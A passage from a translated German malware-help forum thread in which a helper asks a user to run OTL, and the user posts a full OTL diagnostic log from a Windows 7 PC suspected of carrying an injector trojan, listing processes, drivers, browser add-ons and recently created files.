Pests of all kinds and how to fight them: Caught virus/Trojan VirTool:Win32/Injector.DM. According to Microsoft a pretty nasty thing and quite new (Windows 7)
29.10.2012, 12:22 | #16
/// Winkelfunktion /// TB-Süch-Tiger™
System scan with OTL
Please download OTL by OldTimer and save it to your desktop. If it is already present, replace the older existing file with the newly downloaded one so that you are really working with a current version of OTL.
Please post everything here in CODE tags whenever possible. This is how it's done:
[code] the log goes here [/code]
And the whole thing then looks like this:
Code:
the log goes here
__________________
Please always post logfiles in CODE tags
29.10.2012, 15:23 | #17
Hello Cosinus,
here is the log file (I only have one) from OTL:
OTL Logfile:
Code:
OTL logfile created on: 29.10.2012 14:32:18 - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\ASUS TT\Desktop
64bit- Ultimate Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy

4,00 Gb Total Physical Memory | 2,08 Gb Available Physical Memory | 51,93% Memory free
8,00 Gb Paging File | 5,94 Gb Available in Paging File | 74,27% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 149,05 Gb Total Space | 50,64 Gb Free Space | 33,97% Space Free | Partition Type: NTFS
Drive D: | 233,66 Gb Total Space | 134,08 Gb Free Space | 57,38% Space Free | Partition Type: NTFS
Drive E: | 100,00 Mb Total Space | 69,81 Mb Free Space | 69,82% Space Free | Partition Type: NTFS

Computer Name: ASUSTT-PC | User Name: ASUS TT | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - C:\Users\ASUS TT\Desktop\OTL.exe (OldTimer Tools)
PRC - C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
PRC - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_11_4_402_287.exe (Adobe Systems, Inc.)
PRC - C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe (Freemake)
PRC - C:\Program Files (x86)\Freemake\CaptureLib\CaptureLibService.exe (Freemake)
PRC - C:\Program Files (x86)\pdf24\pdf24.exe (Geek Software GmbH)
PRC - C:\Program Files (x86)\TeamViewer\Version7\TeamViewer.exe (TeamViewer GmbH)
PRC - C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe (TeamViewer GmbH)
PRC - C:\Program Files (x86)\TeamViewer\Version7\tv_w32.exe (TeamViewer GmbH)
PRC - C:\Program Files (x86)\avmwlanstick\WlanNetService.exe (AVM Berlin)
PRC - C:\Program Files (x86)\Greenshot\Greenshot.exe ()
PRC - C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe (Safer Networking Limited)
PRC - C:\Program Files (x86)\Spybot - Search & Destroy\SDWinSec.exe (Safer Networking Ltd.)

========== Modules (No Company Name) ==========

MOD - C:\Program Files (x86)\Mozilla Firefox\mozjs.dll ()
MOD - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_4_402_287.dll ()
MOD - C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\7b7fbe651c6e72f12099a298654c9594\System.Windows.Forms.ni.dll ()
MOD - C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6bb439b3f87736d3248ae27d43e2c0d6\System.Drawing.ni.dll ()
MOD - C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\ba3d70b651454c7d49b407b93663bfed\System.Xml.ni.dll ()
MOD - C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\cfa9c506bfb9254c89dace7b83bc9f9d\System.Configuration.ni.dll ()
MOD - C:\Windows\assembly\NativeImages_v2.0.50727_32\System\ce9ff6baf9053ed2ed673d948179195c\System.ni.dll ()
MOD - C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\acfc1391e45fedd2a359778ea57d914c\mscorlib.ni.dll ()
MOD - C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_de_b77a5c561934e089\mscorlib.resources.dll ()
MOD - C:\Program Files (x86)\Greenshot\Greenshot.exe ()
MOD - C:\Program Files (x86)\Greenshot\GreenshotPlugin.dll ()

========== Services (SafeList) ==========

SRV:64bit: - (AppMgmt) -- C:\Windows\SysNative\appmgmts.dll (Microsoft Corporation)
SRV - (NitroReaderDriverReadSpool2) -- C:\Programme\Common Files\Nitro PDF\Reader\2.0\NitroPDFReaderDriverService2x64.exe (Nitro PDF Software)
SRV - (NisSrv) -- C:\Programme\Microsoft Security Client\NisSrv.exe (Microsoft Corporation)
SRV - (MsMpSvc) -- C:\Programme\Microsoft Security Client\MsMpEng.exe (Microsoft Corporation)
SRV - (Freemake Improver) -- C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe (Freemake)
SRV - (FreemakeVideoCapture) -- C:\Program Files (x86)\Freemake\CaptureLib\CaptureLibService.exe (Freemake)
SRV - (wlidsvc) -- C:\Programme\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (Microsoft Corp.)
SRV - (TeamViewer7) -- C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe (TeamViewer GmbH)
SRV - (WAS) -- C:\Windows\SysWOW64\inetsrv\iisw3adm.dll (Microsoft Corporation)
SRV - (W3SVC) -- C:\Windows\SysWOW64\inetsrv\iisw3adm.dll (Microsoft Corporation)
SRV - (AppHostSvc) -- C:\Windows\SysWOW64\inetsrv\apphostsvc.dll (Microsoft Corporation)
SRV - (AVM WLAN Connection Service) -- C:\Program Files (x86)\avmwlanstick\WlanNetService.exe (AVM Berlin)
SRV - (clr_optimization_v4.0.30319_32) -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe (Microsoft Corporation)
SRV - (clr_optimization_v2.0.50727_32) -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe (Microsoft Corporation)

========== Driver Services (SafeList) ==========

DRV:64bit: - (NisDrv) -- C:\Windows\SysNative\drivers\NisDrvWFP.sys (Microsoft Corporation)
DRV:64bit: - (fssfltr) -- C:\Windows\SysNative\drivers\fssfltr.sys (Microsoft Corporation)
DRV:64bit: - (VBoxNetAdp) -- C:\Windows\SysNative\drivers\VBoxNetAdp.sys (Oracle Corporation)
DRV:64bit: - (Fs_Rec) -- C:\Windows\SysNative\drivers\fs_rec.sys (Microsoft Corporation)
DRV:64bit: - (RTL8167) -- C:\Windows\SysNative\drivers\Rt64win7.sys (Realtek )
DRV:64bit: - (teamviewervpn) -- C:\Windows\SysNative\drivers\teamviewervpn.sys (TeamViewer GmbH)
DRV:64bit: - (Ext2Fsd) -- C:\Windows\SysNative\drivers\ext2fsd.sys (www.ext2fsd.com)
DRV:64bit: - (amdsata) -- C:\Windows\SysNative\drivers\amdsata.sys (Advanced Micro Devices)
DRV:64bit: - (amdxata) -- C:\Windows\SysNative\drivers\amdxata.sys (Advanced Micro Devices)
DRV:64bit: - (HpSAMD) -- C:\Windows\SysNative\drivers\HpSAMD.sys (Hewlett-Packard Company)
DRV:64bit: - (TsUsbFlt) -- C:\Windows\SysNative\drivers\TsUsbFlt.sys (Microsoft Corporation)
DRV:64bit: - (RdpVideoMiniport) -- C:\Windows\SysNative\drivers\rdpvideominiport.sys (Microsoft Corporation)
DRV:64bit: - (NVHDA) -- C:\Windows\SysNative\drivers\nvhda64v.sys (NVIDIA Corporation)
DRV:64bit: - (fwlanusbn) -- C:\Windows\SysNative\drivers\fwlanusbn.sys (AVM GmbH)
DRV:64bit: - (avmeject) -- C:\Windows\SysNative\drivers\avmeject.sys (AVM Berlin)
DRV:64bit: - (amdsbs) -- C:\Windows\SysNative\drivers\amdsbs.sys (AMD Technologies Inc.)
DRV:64bit: - (LSI_SAS2) -- C:\Windows\SysNative\drivers\lsi_sas2.sys (LSI Corporation)
DRV:64bit: - (stexstor) -- C:\Windows\SysNative\drivers\stexstor.sys (Promise Technology)
DRV:64bit: - (ebdrv) -- C:\Windows\SysNative\drivers\evbda.sys (Broadcom Corporation)
DRV:64bit: - (b06bdrv) -- C:\Windows\SysNative\drivers\bxvbda.sys (Broadcom Corporation)
DRV:64bit: - (b57nd60a) -- C:\Windows\SysNative\drivers\b57nd60a.sys (Broadcom Corporation)
DRV:64bit: - (hcw85cir) -- C:\Windows\SysNative\drivers\hcw85cir.sys (Hauppauge Computer Works, Inc.)
DRV:64bit: - (RimUsb) -- C:\Windows\SysNative\drivers\RimUsb_AMD64.sys (Research In Motion Limited)
DRV - (WIMMount) -- C:\Windows\SysWOW64\drivers\wimmount.sys (Microsoft Corporation)

========== Standard Registry (SafeList) ==========

========== Internet Explorer ==========

IE:64bit: - HKLM\..\SearchScopes,DefaultScope =
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope =
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope =
IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope =
IE - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
IE - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = de-DE
IE - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 39 2C 02 92 1E 73 CD 01 [binary data]
IE - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\..\SearchScopes,DefaultScope =
IE - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\..\SearchScopes\{0388404D-6072-4CEB-B521-8F090FEAEE57}: "URL" = hxxp://klit.startnow.com/s/?q={searchTerms}&src=defsearch&provider=&provider_name=yahoo&provider_code=&partner_id=693&product_id=741&affiliate_id=&channel=&toolbar_id=200&toolbar_version=2.4.0&install_country=DE&install_date=20120701&user_guid=D284EE3DAB114B7D803864A7EC865E6D&machine_id=19b7a606ba73c4b553ec4228359a0fae&browser=IE&os=win&os_version=6.1-x64-SP0&iesrc={referrer:source}
IE - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = fritz.box

========== FireFox ==========

FF - prefs.js..browser.search.selectedEngine: "MyStart Search"
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "www.google.de"
FF - prefs.js..extensions.enabledAddons: {ACAA314B-EEBA-48e4-AD47-84E31C44796C}:1.0.10
FF - user.js - File not found

FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_11_4_402_287.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.7.2: C:\Windows\system32\npDeployJava1.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.7.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_4_402_287.dll ()
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin: C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeLive,version=1.5: C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3505.0912: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nitropdf.com/NitroPDF: C:\Program Files (x86)\Nitro PDF\Reader 2\npnitromozilla.dll ( )
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.0.2: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)

64bit-FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{336D0C35-8A85-403a-B9D2-65C292C39087}: C:\PROGRAM FILES\WEB ASSISTANT\FIREFOX
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{23fcfd51-4958-4f00-80a3-ae97e717ed8b}: C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2012.07.01 17:06:50 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 16.0.2\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2012.10.29 14:29:33 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 16.0.2\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2012.10.14 20:27:52 | 000,000,000 | ---D | M]

[2012.07.01 13:04:39 | 000,000,000 | ---D | M] (No name found) -- C:\Users\ASUS TT\AppData\Roaming\mozilla\Extensions
[2012.10.23 18:53:05 | 000,000,000 | ---D | M] (No name found) -- C:\Users\ASUS TT\AppData\Roaming\mozilla\Firefox\Profiles\ewlyys0h.default\extensions
[2012.08.14 00:29:55 | 000,000,000 | ---D | M] ("Free YouTube Download (Free Studio) Menu") -- C:\Users\ASUS TT\AppData\Roaming\mozilla\Firefox\Profiles\ewlyys0h.default\extensions\{ACAA314B-EEBA-48e4-AD47-84E31C44796C}
[2012.08.11 20:56:01 | 000,000,000 | ---D | M] (ADDICT-THING) -- C:\Users\ASUS TT\AppData\Roaming\mozilla\Firefox\Profiles\ewlyys0h.default\extensions\5026b649cf7b4@5026b649cf7ee.info
[2012.10.07 13:19:05 | 000,000,000 | ---D | M] (OneClickDownloader) -- C:\Users\ASUS TT\AppData\Roaming\mozilla\Firefox\Profiles\ewlyys0h.default\extensions\OneClickDownload@OneClickDownload.com
[2012.07.10 19:38:19 | 000,263,952 | ---- | M] () (No name found) -- C:\Users\ASUS TT\AppData\Roaming\mozilla\firefox\profiles\ewlyys0h.default\extensions\langpack-de@firefox.mozilla.org.xpi
[2012.07.10 19:34:45 | 000,301,714 | ---- | M] () (No name found) -- C:\Users\ASUS TT\AppData\Roaming\mozilla\firefox\profiles\ewlyys0h.default\extensions\{25A1388B-6B18-46c3-BEBA-A81915D0DE8F}.xpi
[2012.08.12 10:17:35 | 000,741,958 | ---- | M] () (No name found) -- C:\Users\ASUS TT\AppData\Roaming\mozilla\firefox\profiles\ewlyys0h.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
[2012.10.14 20:27:51 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\mozilla firefox\extensions
[2012.10.29 14:29:33 | 000,261,600 | ---- | M] (Mozilla Foundation) -- C:\Program Files (x86)\mozilla firefox\components\browsercomps.dll
[2012.07.01 17:10:40 | 000,472,808 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files (x86)\mozilla firefox\plugins\npdeployJava1.dll
[2012.07.14 01:45:08 | 000,001,392 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\amazondotcom-de.xml
[2012.09.07 21:45:38 | 000,002,465 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\bing.xml
[2012.07.14 01:45:08 | 000,001,153 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\eBay-de.xml
[2012.07.14 01:45:08 | 000,006,805 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\leo_ende_de.xml
[2012.07.14 01:45:08 | 000,001,178 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\wikipedia-de.xml
[2012.07.14 01:45:07 | 000,001,105 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\yahoo-de.xml

O1 HOSTS File: ([2012.10.25 17:17:19 | 000,000,027 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 localhost
O2:64bit: - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2:64bit: - BHO: (Windows Live ID Sign-in Helper) - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Programme\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
O2:64bit: - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (DivX Plus Web Player HTML5 <video>) - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files (x86)\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll (DivX, LLC)
O2 - BHO: (Spybot-S&D IE Protection) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files (x86)\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O4:64bit: - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4 - HKLM..\Run: [PDFPrint] C:\Program Files (x86)\pdf24\pdf24.exe (Geek Software GmbH)
O4 - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001..\Run: [Greenshot] C:\Program Files (x86)\Greenshot\Greenshot.exe ()
O4 - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001..\Run: [SpybotSD TeaTimer] C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe (Safer Networking Limited)
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O7 - HKU\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-18\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-19\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-20\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O8:64bit: - Extra context menu item: Free YouTube Download - C:\Users\ASUS TT\AppData\Roaming\DVDVideoSoftIEHelpers\freeytvdownloader.htm ()
O8:64bit: - Extra context menu item: Free YouTube to MP3 Converter - C:\Users\ASUS TT\AppData\Roaming\DVDVideoSoftIEHelpers\freeyoutubetomp3converter.htm ()
O8:64bit: - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~2\MIF5BA~1\Office10\EXCEL.EXE/3000 File not found
O8 - Extra context menu item: Free YouTube Download - C:\Users\ASUS TT\AppData\Roaming\DVDVideoSoftIEHelpers\freeytvdownloader.htm ()
O8 - Extra context menu item: Free YouTube to MP3 Converter - C:\Users\ASUS TT\AppData\Roaming\DVDVideoSoftIEHelpers\freeyoutubetomp3converter.htm ()
O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~2\MIF5BA~1\Office10\EXCEL.EXE/3000 File not found
O9 - Extra 'Tools' menuitem : Spybot - Search && Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files (x86)\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000007 [] - C:\Programme\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL (Microsoft Corp.)
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000008 [] - C:\Programme\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL (Microsoft Corp.)
O13 - gopher Prefix: missing
O15 - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\..Trusted Domains: fritz.box ([]* in Lokales Intranet)
O15 - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\..Trusted Domains: servertt ([]file in Lokales Intranet)
O15 - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\..Trusted Ranges: Range1 ([*] in Lokales Intranet)
O16:64bit: - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_01-windows-i586.cab (Reg Error: Value error.)
O16:64bit: - DPF: {CAFEEFAC-0017-0000-0001-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_01-windows-i586.cab (Java Plug-in 1.7.0_01)
O16:64bit: - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_01-windows-i586.cab (Java Plug-in 10.7.2)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_22-windows-i586.cab (Java Plug-in 1.6.0_22)
O16 - DPF: {CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_22-windows-i586.cab (Java Plug-in 1.6.0_22)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_22-windows-i586.cab (Java Plug-in 1.6.0_22)
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} https://fpdownload.macromedia.com/get/shockwave/cabs/flash/swflash.cab (Shockwave Flash Object)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.178.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{3133E262-48F1-427F-88FF-298FF3B05A8D}: DhcpNameServer = 192.168.178.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{E6AF5C53-B425-45BB-A4BF-F1416C3A8AF5}: DhcpNameServer = 192.168.178.1
O18:64bit: - Protocol\Handler\livecall - No CLSID value found
O18:64bit: - Protocol\Handler\msdaipp - No CLSID value found
O18:64bit: - Protocol\Handler\msdaipp\0x00000001 - No CLSID value found
O18:64bit: - Protocol\Handler\msdaipp\oledb - No CLSID value found
O18:64bit: - Protocol\Handler\msnim - No CLSID value found
O18:64bit: - Protocol\Handler\mso-offdap - No CLSID value found
O18:64bit: - Protocol\Handler\wlmailhtml - No CLSID value found
O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
O18 - Protocol\Handler\mso-offdap {3D9F03FA-7A94-11D3-BE81-0050048385D1} - C:\PROGRA~2\COMMON~1\MICROS~1\WEBCOM~1\10\OWC10.DLL (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysWOW64\userinit.exe (Microsoft Corporation)
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2012.06.26 19:34:02 | 000,000,000 | ---- | M] () - E:\AUTOEXEC.BAT -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = ComFile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = ComFile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

========== Files/Folders - Created Within 30 Days ==========

[2012.10.29 14:30:28 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\ASUS TT\Desktop\OTL.exe
[2012.10.28 21:05:48 | 004,731,392 | ---- | C] (AVAST Software) -- C:\Users\ASUS TT\Desktop\aswMBR.exe
[2012.10.28 17:28:49 | 000,000,000 | -HSD | C] -- C:\$RECYCLE.BIN
[2012.10.28 15:21:40 | 002,213,464 | ---- | C] (Kaspersky Lab ZAO) -- C:\Users\ASUS TT\Desktop\tdsskiller.exe
[2012.10.28 15:13:09 | 000,000,000 | ---D | C] -- C:\Windows\temp
[2012.10.28 14:59:34 | 004,989,309 | R--- | C] (Swearware) -- C:\Users\ASUS TT\Desktop\ComboFix.exe
[2012.10.25 17:10:02 | 000,518,144 | ---- | C] (SteelWerX) -- C:\Windows\SWREG.exe
[2012.10.25 17:10:02 | 000,060,416 | ---- | C] (NirSoft) -- C:\Windows\NIRCMD.exe
[2012.10.25 17:10:01 | 000,406,528 | ---- | C] (SteelWerX) -- C:\Windows\SWSC.exe
[2012.10.25 17:09:47 | 000,000,000 | ---D | C] -- C:\Users\ASUS TT\AppData\Roaming\NVIDIA
[2012.10.25 17:03:07 | 000,000,000 | ---D | C] -- C:\Qoobox
[2012.10.25 17:02:54 | 000,000,000 | ---D | C] -- C:\Windows\erdnt
[2012.10.21 18:24:53 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\ESET
[2012.10.21 18:24:32 | 002,322,184 | ---- | C] (ESET) -- C:\Users\ASUS TT\Desktop\esetsmartinstaller_enu.exe
[2012.10.18 00:10:40 | 000,000,000 | ---D | C] -- C:\Users\ASUS TT\AppData\Roaming\DriverCure
[2012.10.18 00:10:39 | 000,000,000 | ---D | C] -- C:\Users\ASUS TT\AppData\Roaming\SpeedyPC Software
[2012.10.18 00:10:17 | 000,000,000 | ---D | C] -- C:\ProgramData\SpeedyPC Software
[2012.10.16 19:22:13 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Emsisoft Anti-Malware
[2012.10.16 19:22:13 | 000,000,000 | ---D | C] -- C:\Users\ASUS TT\Documents\Anti-Malware
[2012.10.14 20:27:50 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox
[2012.10.14 19:58:59 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\pdf24
[2012.10.10 19:03:25 | 005,559,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntoskrnl.exe
[2012.10.10 19:03:24 | 003,968,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntkrnlpa.exe
[2012.10.10 19:03:24 | 003,914,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntoskrnl.exe
[2012.10.10 19:03:19 | 001,162,240 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\kernel32.dll
[2012.10.10 19:03:19 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\KernelBase.dll
[2012.10.10 19:03:19 | 000,338,432 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\conhost.exe
[2012.10.10 19:03:19 | 000,215,040 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winsrv.dll
